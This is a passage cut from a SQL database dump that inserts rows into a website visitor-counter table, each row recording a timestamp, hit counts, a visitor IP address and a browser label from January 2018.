4.79.180.8','msie'),(202939,1517144363,1,1,0,0,'54.36.148.231','other'),(202940,1517144455,1,1,0,0,'141.8.142.74','other'),(202941,1517144480,1,1,0,0,'54.36.149.41','other'),(202942,1517144890,1,1,0,0,'54.36.148.69','other'),(202943,1517145274,1,1,0,0,'93.126.80.48','firefox'),(202944,1517145515,1,1,0,0,'54.36.148.190','other'),(202945,1517145948,1,1,0,0,'54.36.149.96','other'),(202946,1517146134,2,2,0,0,'141.8.142.74','other'),(202947,1517146289,3,3,0,0,'216.244.66.194','other'),(202948,1517146368,1,1,0,0,'176.120.38.254','firefox'),(202949,1517146437,1,1,0,0,'54.36.149.87','other'),(202950,1517147061,1,1,0,0,'141.8.142.74','other'),(202951,1517147353,1,0,1,0,'66.249.64.221',''),(202952,1517147641,1,1,0,0,'216.244.66.246','other'),(202953,1517148410,1,1,0,0,'74.115.214.143','other'),(202954,1517148460,1,1,0,0,'54.36.149.63','other'),(202955,1517148837,1,1,0,0,'54.36.148.167','other'),(202956,1517148966,1,1,0,0,'157.55.39.249','other'),(202957,1517149004,1,1,0,0,'141.8.132.19','other'),(202958,1517149247,1,1,0,0,'54.36.149.65','other'),(202959,1517149403,1,1,0,0,'51.255.71.119','other'),(202960,1517149445,1,1,0,0,'54.36.149.67','other'),(202961,1517149503,1,1,0,0,'54.36.148.139','other'),(202962,1517149531,1,1,0,0,'54.36.149.99','other'),(202963,1517149621,1,1,0,0,'8.29.198.25','other'),(202964,1517149713,1,1,0,0,'54.36.148.26','other'),(202965,1517149724,1,1,0,0,'51.255.71.128','other'),(202966,1517149828,1,1,0,0,'74.115.214.134','other'),(202967,1517149830,1,1,0,0,'74.115.214.144','other'),(202968,1517150232,1,1,0,0,'157.55.39.187','other'),(202969,1517150665,1,1,0,0,'87.250.224.46','other'),(202970,1517151248,1,1,0,0,'141.8.142.74','other'),(202971,1517151337,4,4,0,0,'216.244.66.246','other'),(202972,1517151739,1,1,0,0,'94.180.223.223','msie'),(202973,1517151762,1,1,0,0,'54.36.148.206','other'),(202974,1517152457,1,1,0,0,'141.8.142.74','other'),(202975,1517152675,1,1,0,0,'51.255.71.115','other'),(202976,1517152826,2,2,0,0,'54.36.149.25','other'),(202977,1517152944,1,1,0,0,'54.36.148.59','other'),(202978,1517153042,1,1,0,0,'54.36.148.48','other'),(202979,1517153096,1,1,0,0,'157.55.39.175','other'),(202980,1517153100,3,3,0,0,'37.59.222.30','other'),(202981,1517153436,1,1,0,0,'54.36.148.198','other'),(202982,1517153869,2,2,0,0,'178.154.171.88','other'),(202983,1517154009,4,4,0,0,'216.244.66.194','other'),(202984,1517154078,1,1,0,0,'54.36.149.84','other'),(202985,1517154277,1,0,1,0,'66.249.64.29',''),(202986,1517154535,1,1,0,0,'54.36.148.172','other'),(202987,1517154607,1,1,0,0,'54.36.149.68','other'),(202988,1517155166,1,1,0,0,'54.36.148.33','other'),(202989,1517155373,1,1,0,0,'141.8.142.74','other'),(202990,1517155379,1,1,0,0,'54.36.148.111','other'),(202991,1517155745,1,1,0,0,'54.36.148.169','other'),(202992,1517155785,1,1,0,0,'54.36.149.30','other'),(202993,1517155843,1,1,0,0,'54.36.148.247','other'),(202994,1517155971,1,1,0,0,'54.36.149.86','other'),(202995,1517156047,1,0,1,0,'66.249.64.28',''),(202996,1517156075,1,1,0,0,'54.36.148.41','other'),(202997,1517156198,1,1,0,0,'54.36.148.70','other'),(202998,1517156459,1,1,0,0,'31.202.193.180','chrome'),(202999,1517156609,4,4,0,0,'216.244.66.194','other'),(203000,1517156708,1,0,1,0,'66.249.64.29',''),(203001,1517156946,1,1,0,0,'54.36.149.33','other'),(203002,1517157066,1,1,0,0,'54.36.149.105','other'),(203003,1517157326,5,5,0,0,'216.244.66.246','other'),(203004,1517157698,1,1,0,0,'157.55.39.175','other'),(203005,1517158137,1,1,0,0,'54.36.148.160','other'),(203006,1517158167,1,1,0,0,'141.8.142.74','other'),(203007,1517160457,1,1,0,0,'8.29.198.27','other'),(203008,1517160760,1,1,0,0,'141.8.142.74','other'),(203009,1517162172,2,2,0,0,'141.8.142.74','other'),(203010,1517162991,1,1,0,0,'216.244.66.246','other'),(203011,1517163847,1,1,0,0,'216.244.66.194','other'),(203012,1517164214,1,1,0,0,'91.196.178.165','chrome'),(203013,1517164318,1,1,0,0,'157.55.39.249','other'),(203014,1517164837,1,1,0,0,'157.55.39.187','other'),(203015,1517165050,3,3,0,0,'141.8.142.74','other'),(203016,1517165098,1,1,0,0,'157.55.39.66','other'),(203017,1517165122,1,1,0,0,'157.55.39.175','other'),(203018,1517166627,3,3,0,0,'216.244.66.246','other'),(203019,1517167678,1,1,0,0,'178.154.171.88','other'),(203020,1517168174,1,0,1,0,'66.249.64.221',''),(203021,1517171281,1,1,0,0,'8.29.198.26','other'),(203022,1517171547,1,1,0,0,'176.36.77.190','chrome'),(203023,1517172074,1,1,0,0,'46.242.27.103','msie'),(203024,1517172543,1,1,0,0,'141.8.142.74','other'),(203025,1517173123,2,2,0,0,'216.244.66.246','other'),(203026,1517173246,1,1,0,0,'176.36.77.190','chrome'),(203027,1517173332,1,1,0,0,'91.209.11.236','other'),(203028,1517173627,1,1,0,0,'54.36.148.144','other'),(203029,1517174036,1,1,0,0,'54.36.149.96','other'),(203030,1517174062,3,3,0,0,'216.244.66.194','other'),(203031,1517174444,1,1,0,0,'54.36.148.167','other'),(203032,1517174575,1,1,0,0,'54.36.148.149','other'),(203033,1517174636,1,1,0,0,'178.154.171.88','other'),(203034,1517174829,1,1,0,0,'51.255.71.132','other'),(203035,1517175006,1,1,0,0,'54.36.148.182','other'),(203036,1517175103,1,1,0,0,'54.36.149.3','other'),(203037,1517175138,1,1,0,0,'157.55.39.54','other'),(203038,1517175435,1,1,0,0,'54.36.148.104','other'),(203039,1517175530,1,1,0,0,'54.36.148.42','other'),(203040,1517176346,1,1,0,0,'54.36.148.165','other'),(203041,1517176376,2,2,0,0,'199.58.86.211','other'),(203042,1517176550,1,1,0,0,'54.36.148.11','other'),(203043,1517176694,1,1,0,0,'54.36.149.98','other'),(203044,1517176752,1,1,0,0,'54.36.148.205','other'),(203045,1517176833,3,3,0,0,'216.244.66.246','other'),(203046,1517177050,3,3,0,0,'216.244.66.194','other'),(203047,1517177313,1,1,0,0,'54.36.148.185','other'),(203048,1517177440,1,1,0,0,'54.36.148.243','other'),(203049,1517177606,1,1,0,0,'54.36.148.45','other'),(203050,1517177717,1,1,0,0,'54.36.148.67','other'),(203051,1517177944,1,0,1,0,'66.249.64.28',''),(203052,1517178309,1,1,0,0,'54.36.148.189','other'),(203053,1517178316,1,1,0,0,'54.36.148.10','other'),(203054,1517178337,1,1,0,0,'54.36.148.110','other'),(203055,1517178498,1,1,0,0,'54.36.148.153','other'),(203056,1517178953,1,1,0,0,'54.36.149.102','other'),(203057,1517178986,1,0,1,0,'66.249.64.28',''),(203058,1517179366,1,1,0,0,'54.36.148.70','other'),(203059,1517179412,1,1,0,0,'54.36.148.176','other'),(203060,1517179836,1,1,0,0,'54.36.149.90','other'),(203061,1517180138,1,1,0,0,'54.36.148.166','other'),(203062,1517180205,1,1,0,0,'54.36.148.135','other'),(203063,1517180494,1,1,0,0,'51.255.71.132','other'),(203064,1517180501,1,1,0,0,'54.36.148.203','other'),(203065,1517180624,1,1,0,0,'54.36.148.41','other'),(203066,1517180779,1,1,0,0,'141.8.142.74','other'),(203067,1517181174,1,1,0,0,'54.36.148.95','other'),(203068,1517181585,1,1,0,0,'54.36.148.41','other'),(203069,1517181786,1,1,0,0,'54.36.148.30','other'),(203070,1517181862,1,1,0,0,'54.36.149.39','other'),(203071,1517182113,1,1,0,0,'8.29.198.27','other'),(203072,1517182136,1,1,0,0,'54.36.149.97','other'),(203073,1517182218,1,1,0,0,'54.36.148.56','other'),(203074,1517182283,1,1,0,0,'54.36.148.84','other'),(203075,1517182402,1,1,0,0,'54.36.149.91','other'),(203076,1517182426,1,1,0,0,'141.8.142.74','other'),(203077,1517182536,2,2,0,0,'91.209.11.236','other'),(203078,1517183147,1,1,0,0,'54.36.148.111','other'),(203079,1517183158,1,1,0,0,'54.36.148.199','other'),(203080,1517183184,1,1,0,0,'157.55.39.122','other'),(203081,1517183386,1,1,0,0,'130.180.218.72','chrome'),(203082,1517183458,1,1,0,0,'87.250.224.46','other'),(203083,1517183815,2,2,0,0,'216.244.66.246','other'),(203084,1517183971,1,1,0,0,'54.36.148.92','other'),(203085,1517184069,1,1,0,0,'54.36.149.3','other'),(203086,1517184086,1,1,0,0,'54.36.148.104','other'),(203087,1517184576,1,1,0,0,'54.36.148.98','other'),(203088,1517184757,1,1,0,0,'141.8.142.74','other'),(203089,1517184819,1,1,0,0,'54.36.148.93','other'),(203090,1517184906,1,1,0,0,'54.36.149.10','other'),(203091,1517185175,1,1,0,0,'54.36.148.119','other'),(203092,1517185435,1,1,0,0,'216.244.66.194','other'),(203093,1517185502,1,1,0,0,'180.76.15.134','other'),(203094,1517185789,1,1,0,0,'54.36.148.203','other'),(203095,1517186106,1,1,0,0,'54.36.148.162','other'),(203096,1517186164,4,4,0,0,'216.244.66.246','other'),(203097,1517186533,1,1,0,0,'54.36.148.18','other'),(203098,1517186611,1,1,0,0,'54.36.148.108','other'),(203099,1517186898,1,1,0,0,'54.36.148.160','other'),(203100,1517186968,2,2,0,0,'83.31.187.132','msie'),(203101,1517187307,5,5,0,0,'216.244.66.194','other'),(203102,1517187437,1,1,0,0,'157.55.39.176','other'),(203103,1517187438,1,1,0,0,'54.36.148.42','other'),(203104,1517187544,1,1,0,0,'54.36.148.117','other'),(203105,1517187620,1,1,0,0,'54.36.148.255','other'),(203106,1517187625,1,1,0,0,'54.36.148.253','other'),(203107,1517187671,1,1,0,0,'54.36.149.5','other'),(203108,1517187819,1,1,0,0,'54.36.148.91','other'),(203109,1517188555,1,1,0,0,'54.36.148.20','other'),(203110,1517188897,1,1,0,0,'54.36.148.142','other'),(203111,1517189344,1,1,0,0,'54.36.148.183','other'),(203112,1517189460,1,1,0,0,'141.8.142.74','other'),(203113,1517189492,1,1,0,0,'91.209.11.236','other'),(203114,1517190375,1,1,0,0,'54.36.149.9','other'),(203115,1517190484,1,1,0,0,'37.9.113.101','other'),(203116,1517190541,1,1,0,0,'54.36.148.150','other'),(203117,1517190777,1,1,0,0,'217.69.133.18','other'),(203118,1517190843,1,1,0,0,'54.36.148.77','other'),(203119,1517190872,1,1,0,0,'207.46.13.56','other'),(203120,1517191038,1,1,0,0,'54.36.148.136','other'),(203121,1517191140,1,1,0,0,'54.36.149.93','other'),(203122,1517191173,1,1,0,0,'51.255.71.127','other'),(203123,1517191398,1,1,0,0,'54.36.149.18','other'),(203124,1517191712,1,1,0,0,'54.36.148.249','other'),(203125,1517191805,1,1,0,0,'54.36.148.32','other'),(203126,1517191845,1,1,0,0,'54.36.148.204','other'),(203127,1517192094,1,1,0,0,'54.36.149.105','other'),(203128,1517192116,1,1,0,0,'178.154.171.88','other'),(203129,1517192175,1,1,0,0,'54.36.148.42','other'),(203130,1517192330,1,1,0,0,'54.36.148.45','other'),(203131,1517192387,1,1,0,0,'54.36.149.97','other'),(203132,1517192438,1,1,0,0,'54.36.149.72','other'),(203133,1517192600,1,1,0,0,'54.36.148.117','other'),(203134,1517192695,1,1,0,0,'51.255.71.119','other'),(203135,1517192878,1,1,0,0,'54.36.148.253','other'),(203136,1517192945,1,1,0,0,'8.29.198.26','other'),(203137,1517192964,1,1,0,0,'54.36.148.32','other');
INSERT INTO `fw3gt_zt_visitor_counter` VALUES (203138,1517193024,1,1,0,0,'54.36.148.98','other'),(203139,1517193249,1,1,0,0,'54.36.149.39','other'),(203140,1517193343,1,1,0,0,'54.36.149.63','other'),(203141,1517193538,1,1,0,0,'54.36.148.132','other'),(203142,1517193559,1,1,0,0,'54.36.148.200','other'),(203143,1517193584,1,1,0,0,'54.36.148.117','other'),(203144,1517193589,1,1,0,0,'54.36.149.105','other'),(203145,1517193650,1,1,0,0,'54.36.148.166','other'),(203146,1517193656,1,1,0,0,'54.36.148.10','other'),(203147,1517193831,1,1,0,0,'51.255.71.125','other'),(203148,1517193853,1,1,0,0,'37.9.113.182','other'),(203149,1517194249,1,1,0,0,'54.36.148.242','other'),(203150,1517194282,1,1,0,0,'54.36.149.41','other'),(203151,1517194418,1,1,0,0,'54.36.149.8','other'),(203152,1517194908,1,1,0,0,'54.36.148.41','other'),(203153,1517195349,1,1,0,0,'54.36.149.30','other'),(203154,1517195730,1,1,0,0,'216.244.66.246','other'),(203155,1517195912,2,2,0,0,'216.244.66.194','other'),(203156,1517195940,1,1,0,0,'54.36.149.59','other'),(203157,1517195994,1,1,0,0,'54.36.148.246','other'),(203158,1517196245,1,1,0,0,'54.36.148.37','other'),(203159,1517196371,1,1,0,0,'178.154.171.88','other'),(203160,1517196820,1,1,0,0,'51.255.71.117','other'),(203161,1517196896,3,3,0,0,'216.244.66.246','other'),(203162,1517196921,1,1,0,0,'54.36.148.95','other'),(203163,1517196964,4,4,0,0,'216.244.66.194','other'),(203164,1517197189,1,1,0,0,'54.36.148.39','other'),(203165,1517197508,1,1,0,0,'54.36.148.137','other'),(203166,1517197633,1,1,0,0,'54.36.148.89','other'),(203167,1517197698,1,1,0,0,'54.36.148.174','other'),(203168,1517197945,1,1,0,0,'54.36.148.204','other'),(203169,1517198132,1,1,0,0,'54.36.148.167','other'),(203170,1517198140,1,1,0,0,'178.154.171.88','other'),(203171,1517198168,1,1,0,0,'54.36.148.188','other'),(203172,1517198391,1,1,0,0,'54.36.148.138','other'),(203173,1517198600,1,1,0,0,'54.36.149.34','other'),(203174,1517198735,1,1,0,0,'54.36.149.105','other'),(203175,1517198812,1,1,0,0,'54.36.149.1','other'),(203176,1517199060,1,1,0,0,'54.36.149.59','other'),(203177,1517199160,1,1,0,0,'54.36.149.67','other'),(203178,1517199187,1,1,0,0,'54.36.148.135','other'),(203179,1517199190,1,1,0,0,'54.36.148.145','other'),(203180,1517199325,1,1,0,0,'54.36.148.229','other'),(203181,1517199649,1,1,0,0,'54.36.148.201','other'),(203182,1517199823,1,1,0,0,'128.74.246.245','other'),(203183,1517199868,1,1,0,0,'54.36.149.98','other'),(203184,1517200249,1,1,0,0,'54.36.148.45','other'),(203185,1517200444,1,1,0,0,'141.8.142.74','other'),(203186,1517200634,1,1,0,0,'54.234.65.223','other'),(203187,1517200704,1,1,0,0,'54.36.149.104','other'),(203188,1517200722,1,1,0,0,'51.255.71.120','other'),(203189,1517200855,1,1,0,0,'54.36.148.112','other'),(203190,1517200899,1,1,0,0,'54.36.148.111','other'),(203191,1517201047,1,1,0,0,'54.36.148.137','other'),(203192,1517201357,1,1,0,0,'51.255.71.119','other'),(203193,1517202066,1,1,0,0,'54.36.149.26','other'),(203194,1517202652,1,1,0,0,'54.36.149.0','other'),(203195,1517202670,1,1,0,0,'207.46.13.2','other'),(203196,1517202690,1,1,0,0,'178.154.171.88','other'),(203197,1517202729,1,1,0,0,'54.36.148.176','other'),(203198,1517202876,1,1,0,0,'54.36.148.143','other'),(203199,1517203122,1,1,0,0,'54.36.148.196','other'),(203200,1517203367,1,1,0,0,'54.36.149.32','other'),(203201,1517203370,1,1,0,0,'54.36.149.69','other'),(203202,1517203493,1,1,0,0,'207.46.13.1','other'),(203203,1517203560,1,1,0,0,'141.8.142.74','other'),(203204,1517203773,1,1,0,0,'8.29.198.25','other'),(203205,1517203943,24,24,0,0,'178.203.120.211','other'),(203206,1517204248,1,1,0,0,'54.36.148.187','other'),(203207,1517204524,1,1,0,0,'54.36.148.16','other'),(203208,1517204560,1,1,0,0,'54.36.148.15','other'),(203209,1517204942,1,1,0,0,'54.36.149.102','other'),(203210,1517205531,6,6,0,0,'216.244.66.194','other'),(203211,1517205548,1,1,0,0,'51.255.71.127','other'),(203212,1517205635,1,1,0,0,'54.36.149.52','other'),(203213,1517206182,3,3,0,0,'216.244.66.246','other'),(203214,1517206498,2,2,0,0,'141.8.142.74','other'),(203215,1517206699,1,1,0,0,'51.255.71.128','other'),(203216,1517206994,1,1,0,0,'54.36.148.180','other'),(203217,1517207267,1,1,0,0,'54.36.148.232','other'),(203218,1517207296,4,4,0,0,'216.244.66.246','other'),(203219,1517207442,1,1,0,0,'54.36.148.152','other'),(203220,1517207507,1,1,0,0,'54.36.149.10','other'),(203221,1517207592,3,3,0,0,'216.244.66.194','other'),(203222,1517207611,1,1,0,0,'91.209.11.236','other'),(203223,1517208093,1,1,0,0,'54.36.148.235','other'),(203224,1517208350,1,1,0,0,'54.36.148.11','other'),(203225,1517208475,1,1,0,0,'54.36.149.26','other'),(203226,1517208519,1,1,0,0,'178.92.178.64','chrome'),(203227,1517208799,1,1,0,0,'141.8.142.74','other'),(203228,1517209012,1,1,0,0,'54.36.148.21','other'),(203229,1517209335,1,1,0,0,'54.36.149.38','other'),(203230,1517209398,1,1,0,0,'54.36.149.103','other'),(203231,1517209437,1,1,0,0,'54.36.149.5','other'),(203232,1517209462,1,1,0,0,'37.52.102.247','chrome'),(203233,1517209575,1,1,0,0,'54.36.148.168','other'),(203234,1517209608,1,1,0,0,'91.196.178.163','chrome'),(203235,1517209671,1,1,0,0,'91.196.178.78','chrome'),(203236,1517209702,1,1,0,0,'54.36.148.53','other'),(203237,1517210096,1,1,0,0,'207.46.13.2','other'),(203238,1517210109,1,1,0,0,'54.36.148.12','other'),(203239,1517210110,1,1,0,0,'51.255.71.132','other'),(203240,1517210258,1,1,0,0,'54.36.148.244','other'),(203241,1517210360,1,1,0,0,'54.36.148.188','other'),(203242,1517210472,1,1,0,0,'66.249.64.221','chrome'),(203243,1517210485,1,1,0,0,'54.36.148.182','other'),(203244,1517210496,1,1,0,0,'54.36.149.50','other'),(203245,1517210568,1,1,0,0,'54.36.149.91','other'),(203246,1517210613,1,1,0,0,'91.196.178.163','chrome'),(203247,1517210874,1,1,0,0,'54.36.148.245','other'),(203248,1517211006,1,1,0,0,'54.36.148.85','other'),(203249,1517211188,1,1,0,0,'54.36.149.28','other'),(203250,1517211384,1,1,0,0,'91.209.11.236','other'),(203251,1517211754,1,1,0,0,'54.36.148.180','other'),(203252,1517212170,1,1,0,0,'54.36.148.251','other'),(203253,1517212190,1,1,0,0,'54.36.149.74','other'),(203254,1517212315,1,1,0,0,'54.36.148.16','other'),(203255,1517212348,1,1,0,0,'54.36.148.41','other'),(203256,1517212519,1,1,0,0,'77.111.244.66','chrome'),(203257,1517212590,1,1,0,0,'54.36.149.79','other'),(203258,1517212736,1,1,0,0,'77.111.244.69','chrome'),(203259,1517212765,1,1,0,0,'91.209.11.236','other'),(203260,1517212989,1,1,0,0,'54.36.148.76','other'),(203261,1517212998,2,2,0,0,'54.36.148.64','other'),(203262,1517213030,1,0,1,0,'66.249.64.29',''),(203263,1517213053,1,1,0,0,'91.124.239.59','chrome'),(203264,1517213304,1,1,0,0,'54.36.148.237','other'),(203265,1517213342,1,1,0,0,'54.36.149.39','other'),(203266,1517213604,1,1,0,0,'54.36.148.34','other'),(203267,1517213836,1,1,0,0,'51.255.71.129','other'),(203268,1517213857,1,1,0,0,'54.36.148.193','other'),(203269,1517214048,1,0,1,0,'66.249.64.217',''),(203270,1517214508,1,1,0,0,'54.36.148.171','other'),(203271,1517214621,1,1,0,0,'8.29.198.25','other'),(203272,1517214659,1,1,0,0,'91.196.178.77','chrome'),(203273,1517214722,1,1,0,0,'54.36.148.205','other'),(203274,1517214792,1,1,0,0,'91.196.178.161','chrome'),(203275,1517214845,1,1,0,0,'54.36.148.254','other'),(203276,1517215343,1,1,0,0,'216.244.66.246','other'),(203277,1517215358,1,1,0,0,'54.36.148.155','other'),(203278,1517215415,2,2,0,0,'216.244.66.194','other'),(203279,1517215504,1,1,0,0,'198.37.118.9','firefox'),(203280,1517215506,1,1,0,0,'5.45.207.69','other'),(203281,1517216022,1,1,0,0,'54.36.148.65','other'),(203282,1517216085,1,1,0,0,'178.95.16.30','firefox'),(203283,1517216145,1,1,0,0,'46.201.87.141','chrome'),(203284,1517216184,1,1,0,0,'54.36.148.169','other'),(203285,1517216205,1,1,0,0,'51.255.71.133','other'),(203286,1517216563,1,1,0,0,'54.36.148.70','other'),(203287,1517216587,1,1,0,0,'54.36.148.231','other'),(203288,1517216675,1,1,0,0,'51.255.71.123','other'),(203289,1517216686,1,1,0,0,'54.36.149.0','other'),(203290,1517216753,1,1,0,0,'51.255.71.118','other'),(203291,1517216812,1,1,0,0,'37.144.153.181','msie'),(203292,1517216966,1,1,0,0,'5.53.114.152','chrome'),(203293,1517216972,1,1,0,0,'141.8.142.74','other'),(203294,1517217016,1,1,0,0,'54.36.149.55','other'),(203295,1517217036,4,4,0,0,'216.244.66.194','other'),(203296,1517217152,1,1,0,0,'54.36.148.32','other'),(203297,1517217245,1,1,0,0,'54.36.148.156','other'),(203298,1517217346,1,1,0,0,'91.196.178.65','firefox'),(203299,1517217385,1,1,0,0,'51.255.71.120','other'),(203300,1517217460,1,1,0,0,'54.36.148.91','other'),(203301,1517217481,1,1,0,0,'54.36.148.197','other'),(203302,1517217684,1,1,0,0,'54.36.149.10','other'),(203303,1517217737,1,1,0,0,'54.36.148.71','other'),(203304,1517217761,1,1,0,0,'157.55.39.111','other'),(203305,1517217786,1,1,0,0,'54.36.149.95','other'),(203306,1517217902,1,1,0,0,'66.249.64.30','chrome'),(203307,1517218192,1,1,0,0,'54.36.148.89','other'),(203308,1517218260,1,1,0,0,'91.209.11.236','other'),(203309,1517218294,1,1,0,0,'54.36.148.156','other'),(203310,1517218377,1,1,0,0,'54.36.149.81','other'),(203311,1517218405,1,1,0,0,'54.36.148.147','other'),(203312,1517218484,1,1,0,0,'91.196.178.77','chrome'),(203313,1517218485,1,1,0,0,'54.36.148.69','other'),(203314,1517218682,1,1,0,0,'54.36.149.42','other'),(203315,1517218700,1,1,0,0,'141.8.142.74','other'),(203316,1517219311,3,3,0,0,'216.244.66.246','other'),(203317,1517220066,2,2,0,0,'91.209.11.236','other'),(203318,1517220079,1,0,1,0,'66.249.64.30',''),(203319,1517220417,1,1,0,0,'54.36.148.200','other'),(203320,1517220615,1,1,0,0,'54.36.148.111','other'),(203321,1517221044,1,1,0,0,'54.36.148.124','other'),(203322,1517221101,1,1,0,0,'188.163.106.169','chrome'),(203323,1517221238,1,1,0,0,'54.36.148.113','other'),(203324,1517221291,1,1,0,0,'134.249.146.125','chrome'),(203325,1517221559,1,1,0,0,'54.36.148.117','other'),(203326,1517221565,1,1,0,0,'54.36.148.37','other'),(203327,1517221648,1,1,0,0,'95.132.124.5','firefox'),(203328,1517221757,1,1,0,0,'54.36.148.32','other'),(203329,1517221785,1,0,1,0,'66.249.64.30',''),(203330,1517221855,1,1,0,0,'94.179.147.128','chrome'),(203331,1517221951,1,1,0,0,'54.36.148.159','other'),(203332,1517222131,1,1,0,0,'54.36.148.254','other'),(203333,1517222167,1,1,0,0,'54.36.148.166','other'),(203334,1517222597,1,1,0,0,'178.154.171.88','other'),(203335,1517222829,1,1,0,0,'54.36.148.119','other'),(203336,1517222846,1,1,0,0,'178.140.120.12','msie'),(203337,1517222855,1,1,0,0,'91.196.178.92','chrome'),(203338,1517223022,1,1,0,0,'54.36.149.7','other'),(203339,1517223759,1,1,0,0,'37.9.113.182','other'),(203340,1517223820,1,1,0,0,'54.36.148.187','other'),(203341,1517224071,1,1,0,0,'54.36.149.3','other'),(203342,1517224126,1,1,0,0,'91.196.178.166','chrome'),(203343,1517224149,1,1,0,0,'37.53.76.152','chrome'),(203344,1517224227,1,1,0,0,'78.111.190.174','chrome'),(203345,1517224517,1,1,0,0,'107.167.107.99','other'),(203346,1517224577,1,1,0,0,'54.36.149.6','other'),(203347,1517224700,1,1,0,0,'54.36.148.204','other'),(203348,1517224735,1,1,0,0,'54.36.148.201','other'),(203349,1517224745,1,1,0,0,'54.36.149.4','other'),(203350,1517224902,4,4,0,0,'216.244.66.246','other'),(203351,1517224971,1,1,0,0,'54.36.148.101','other'),(203352,1517225008,1,1,0,0,'54.36.149.107','other'),(203353,1517225233,1,1,0,0,'178.154.171.88','other'),(203354,1517225292,4,4,0,0,'216.244.66.194','other'),(203355,1517225469,1,1,0,0,'8.29.198.27','other'),(203356,1517225470,1,1,0,0,'212.33.255.53','firefox'),(203357,1517225772,1,1,0,0,'54.36.149.91','other'),(203358,1517225847,1,1,0,0,'54.36.148.67','other'),(203359,1517225929,1,1,0,0,'54.36.148.77','other'),(203360,1517225964,1,1,0,0,'54.36.148.142','other'),(203361,1517226113,1,1,0,0,'54.36.149.19','other'),(203362,1517226871,1,1,0,0,'54.36.148.200','other'),(203363,1517227012,1,1,0,0,'92.113.127.44','chrome'),(203364,1517227115,3,3,0,0,'216.244.66.194','other'),(203365,1517227260,1,1,0,0,'91.209.11.236','other'),(203366,1517227661,1,1,0,0,'54.36.149.52','other'),(203367,1517227690,1,1,0,0,'54.36.149.58','other'),(203368,1517227761,1,1,0,0,'54.36.148.85','other'),(203369,1517227888,1,1,0,0,'54.36.148.94','other'),(203370,1517227985,2,2,0,0,'91.196.177.46','chrome'),(203371,1517228057,1,1,0,0,'54.36.149.71','other'),(203372,1517228118,1,1,0,0,'54.36.148.245','other'),(203373,1517228240,1,1,0,0,'54.36.148.158','other'),(203374,1517228285,1,0,1,0,'66.249.64.30',''),(203375,1517228507,1,1,0,0,'91.196.178.92','chrome'),(203376,1517228626,1,1,0,0,'54.36.149.86','other'),(203377,1517228670,1,1,0,0,'13.56.229.65','chrome'),(203378,1517228685,1,1,0,0,'54.36.148.104','other'),(203379,1517228828,1,0,1,0,'66.249.64.217',''),(203380,1517229117,1,1,0,0,'51.255.71.128','other'),(203381,1517229175,1,1,0,0,'198.37.118.9','firefox'),(203382,1517229351,1,1,0,0,'54.36.148.248','other'),(203383,1517229412,1,1,0,0,'91.196.178.92','chrome'),(203384,1517229655,2,2,0,0,'141.8.142.74','other'),(203385,1517229661,1,1,0,0,'178.92.159.87','firefox'),(203386,1517229867,1,1,0,0,'54.36.148.38','other'),(203387,1517230087,1,1,0,0,'54.36.148.13','other'),(203388,1517230129,3,3,0,0,'216.244.66.246','other'),(203389,1517230170,1,1,0,0,'54.36.149.80','other'),(203390,1517230233,1,1,0,0,'54.36.148.182','other'),(203391,1517230320,1,1,0,0,'91.196.178.92','chrome'),(203392,1517230424,1,1,0,0,'54.36.148.104','other'),(203393,1517230774,1,1,0,0,'91.209.11.236','other'),(203394,1517231104,1,1,0,0,'54.36.148.118','other'),(203395,1517231214,7,7,0,0,'91.137.17.89','other'),(203396,1517231342,1,1,0,0,'54.36.148.235','other'),(203397,1517231378,1,1,0,0,'91.196.178.92','chrome'),(203398,1517231567,1,1,0,0,'54.36.148.151','other'),(203399,1517231987,1,1,0,0,'176.105.216.52','other'),(203400,1517231999,3,3,0,0,'141.8.142.74','other'),(203401,1517232121,1,1,0,0,'178.154.171.88','other'),(203402,1517232138,1,1,0,0,'54.36.149.42','other'),(203403,1517232372,1,1,0,0,'188.32.51.249','msie'),(203404,1517232569,1,1,0,0,'91.196.178.92','chrome'),(203405,1517232613,1,1,0,0,'54.36.148.88','other'),(203406,1517232656,2,2,0,0,'91.209.11.236','other'),(203407,1517232771,1,1,0,0,'54.36.148.236','other'),(203408,1517232776,1,0,1,0,'66.249.64.28',''),(203409,1517232784,1,1,0,0,'54.36.148.29','other'),(203410,1517232858,1,1,0,0,'54.36.148.192','other'),(203411,1517232912,1,1,0,0,'54.36.148.171','other'),(203412,1517232928,1,1,0,0,'91.196.178.65','firefox'),(203413,1517232936,78,78,0,0,'144.76.8.134','other'),(203414,1517233134,1,1,0,0,'54.36.148.129','other'),(203415,1517233169,1,1,0,0,'54.36.149.3','other'),(203416,1517233290,1,1,0,0,'54.36.149.9','other'),(203417,1517233371,1,1,0,0,'91.196.178.78','chrome'),(203418,1517233419,1,1,0,0,'37.9.113.182','other'),(203419,1517233423,1,1,0,0,'178.154.200.32','other'),(203420,1517233491,1,0,1,0,'66.249.64.221',''),(203421,1517233552,2,0,2,0,'68.180.229.52',''),(203422,1517233597,1,1,0,0,'91.196.177.15','chrome'),(203423,1517233626,1,1,0,0,'54.36.148.86','other'),(203424,1517234098,1,1,0,0,'91.196.178.92','chrome'),(203425,1517234108,6,6,0,0,'216.244.66.246','other'),(203426,1517234178,1,1,0,0,'178.154.171.88','other'),(203427,1517234230,1,1,0,0,'125.209.235.178','other'),(203428,1517234310,1,1,0,0,'178.92.159.87','firefox'),(203429,1517234448,1,1,0,0,'54.36.148.188','other'),(203430,1517234501,1,1,0,0,'54.36.149.67','other'),(203431,1517234650,1,1,0,0,'216.244.66.194','other'),(203432,1517234948,1,1,0,0,'54.36.148.192','other'),(203433,1517235805,1,1,0,0,'54.36.148.150','other'),(203434,1517236008,1,1,0,0,'207.46.13.181','other'),(203435,1517236180,1,1,0,0,'54.36.149.0','other'),(203436,1517236233,1,1,0,0,'54.36.148.186','other'),(203437,1517236253,1,1,0,0,'54.36.149.24','other'),(203438,1517236263,1,1,0,0,'54.36.149.17','other'),(203439,1517236301,1,1,0,0,'8.29.198.27','other'),(203440,1517236478,1,1,0,0,'54.36.149.15','other'),(203441,1517236538,1,1,0,0,'54.36.148.191','other'),(203442,1517236608,1,0,1,0,'66.249.64.30',''),(203443,1517236686,1,1,0,0,'54.36.149.40','other'),(203444,1517236690,1,1,0,0,'54.36.148.120','other'),(203445,1517236722,1,1,0,0,'54.36.149.102','other'),(203446,1517236809,1,1,0,0,'5.53.114.152','chrome'),(203447,1517237062,1,1,0,0,'54.36.148.11','other'),(203448,1517237218,2,2,0,0,'216.244.66.194','other'),(203449,1517237721,1,1,0,0,'91.209.11.236','other'),(203450,1517237784,1,1,0,0,'54.36.148.118','other'),(203451,1517237828,1,1,0,0,'54.36.1